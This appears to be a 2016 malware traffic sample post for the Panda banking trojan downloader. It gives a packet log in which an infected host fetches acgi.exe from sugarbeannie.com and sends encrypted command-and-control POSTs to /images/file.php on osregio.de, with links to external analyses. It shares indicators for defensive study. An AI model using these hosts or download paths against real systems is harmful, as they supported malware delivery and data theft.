Panda Malware Trojan Downloader 37.17.224.44 POST /images/file.php acgi.exe PCAP file Download Traffic Sample

https://malwr.com/analysis/NzM3YjRiY2NhMmI1NDljNjhjNTkwMDk2NjkzYmFlYjQ/

https://www.virustotal.com/en/file/0858e188c9312ee2e4cf3c85ae4ba11dafba30a1dca36ca40a2d2d5f712f07af/analysis/1477177765/

 

2016-10-23 00:52:03.435441 IP 192.168.1.102.58739 > 103.44.63.13.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /files/acgi.exe HTTP/1.1
E..Ml.@…$….fg,?..s.Pl.{….(P…….GET /files/acgi.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sugarbeannie.com
Connection: Keep-Alive


E..(..@……..f%..,.v.Pb..:p..AP…`9……..
2016-10-23 00:52:37.816876 IP 192.168.1.102.58742 > 37.17.224.44.80: Flags [P.], seq 0:358, ack 1, win 256, length 358: HTTP: POST /images/file.php HTTP/1.1
E…..@……..f%..,.v.Pb..:p..AP…. ..POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.&.D’.A…7.O7..(…..]….IZ….#n…..H       h..M./..”..`….M.c9…w…”l&.m.!…J/}…x.c……A…..Q.{..y..Q%|.|…p.>..a.@’9,.<..L.P..R.~U..

E..(..@……..f%..,.w.P@…….P….m……..
2016-10-23 00:52:37.827633 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 0:348, ack 1, win 256, length 348: HTTP: POST /images/file.php HTTP/1.1
E…..@……..f%..,.w.P@…….P….u..POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache

..Nv.HG.-%…….0v}I.Vc<.W.B…k.`@..88u..*..=h….Xg….[w’

E..(..@……..f%..,.v.Pb…p.o.P….q……..
2016-10-23 00:52:40.282011 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 348:709, ack 21513, win 252, length 361: HTTP: POST /images/file.php HTTP/1.1
E…..@….>…f%..,.w.P@…..&.P…D…POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

…..DOlkG..H.v….<…..z….2YtQ..\.n.m..4.]..D..Y….&..G.j…Bm.$-.`i.1.q.Y.}.J.[E.a4..[.|…TL.6.-|.w….P…..).<…e..jh=…G6M8.cZ..9….

E..( :@….J…f%..,.w.P@..v…/P….@……..

2016-10-23 00:53:05.970828 IP 192.168.1.102.58748 > 216.58.195.132.80: Flags [P.], seq 0:339, ack 1, win 256, length 339: HTTP: GET /webhp HTTP/1.1
E..{..@……..f.:…|.P.xT…%.P…pY..GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.google.com
Cache-Control: no-cache
Cookie: NID=80=PuI3ndFmrhORQcOnvJ78stoO8InYSSywkr-fV9tep-Q7iuWsGr9Toq-gfXnI-eUu1XBaJH5lNn8li2RI3q_aECCWd59Sq97Q1JSMQE-QkORL_13WACLtVTyIFGWSEq_4t3yjuJgknq_Ts6U